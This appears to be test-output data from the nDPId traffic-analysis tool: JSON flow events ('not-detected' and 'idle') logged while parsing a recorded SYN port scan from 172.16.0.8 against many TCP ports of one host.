-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1972,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1972,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1974,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1974,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1984,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1984,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57294,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57294,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 